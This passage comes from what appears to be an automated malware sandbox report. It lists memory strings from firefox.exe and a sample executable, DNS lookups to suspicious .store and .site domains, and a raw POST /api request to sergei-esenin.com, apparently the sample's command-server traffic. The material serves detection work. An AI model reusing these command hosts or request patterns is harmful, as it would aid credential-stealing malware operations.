"*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: 976d9f40c1.exe, 00000009.00000003.2803479877.000000000172B000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806627641.000000000172B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ ht equals www.youtube.com (Youtube)
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3190977746.000001379C4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000019.00000002.3190977746.000001379C4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://*.finance.yahoo.com/*https://*.piped.kavin.rocks/*https://*.piped.silkky.cloud/*www.google.com equals www.yahoo.com (Yahoo)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3257901918.00000137A67B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3272561632.00000E3FE0E00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/Z equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3257901918.00000137A6715000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3257901918.00000137A67B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/{incognito:null, tabId:null, types:null, urls:["*://*.bancosantander.es/*", "*://*.gruposantander.es/*", "*://*.santander.co.uk/*"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/{incognito:null, tabId:null, types:null, urls:["*://*.bancosantander.es/*", "*://*.gruposantander.es/*", "*://*.santander.co.uk/*"], windowId:null} equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3190977746.000001379C4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3190977746.000001379C4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3190977746.000001379C4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/DeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/DeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/DeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3272561632.00000E3FE0E00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Z equals www.youtube.com (Youtube)
Source: 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: tps://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: tps://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cb9e7f3651c38ac41ccf738a8ba3498dc; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=9ec3d07959c524245a527493; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26105Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 23 Oct 2024 13:49:17 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3210751265.000001379F221000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3213506140.000001379F6F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3272561632.00000E3FE0E00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3272561632.00000E3FE0E00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.comZ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3272561632.00000E3FE0E00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A9157000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3041536063.00000137A9169000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3272561632.00000E3FE0E00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.comZ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3210751265.000001379F217000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E639000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3213506140.000001379F6DA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: clearancek.site
Source: global traffic DNS traffic detected: DNS query: mobbipenju.store
Source: global traffic DNS traffic detected: DNS query: eaglepawnoy.store
Source: global traffic DNS traffic detected: DNS query: dissapoiznw.store
Source: global traffic DNS traffic detected: DNS query: studennotediw.store
Source: global traffic DNS traffic detected: DNS query: bathdoomgaz.store
Source: global traffic DNS traffic detected: DNS query: spirittunek.store
Source: global traffic DNS traffic detected: DNS query: licendfilteo.site
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: sergei-esenin.com
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
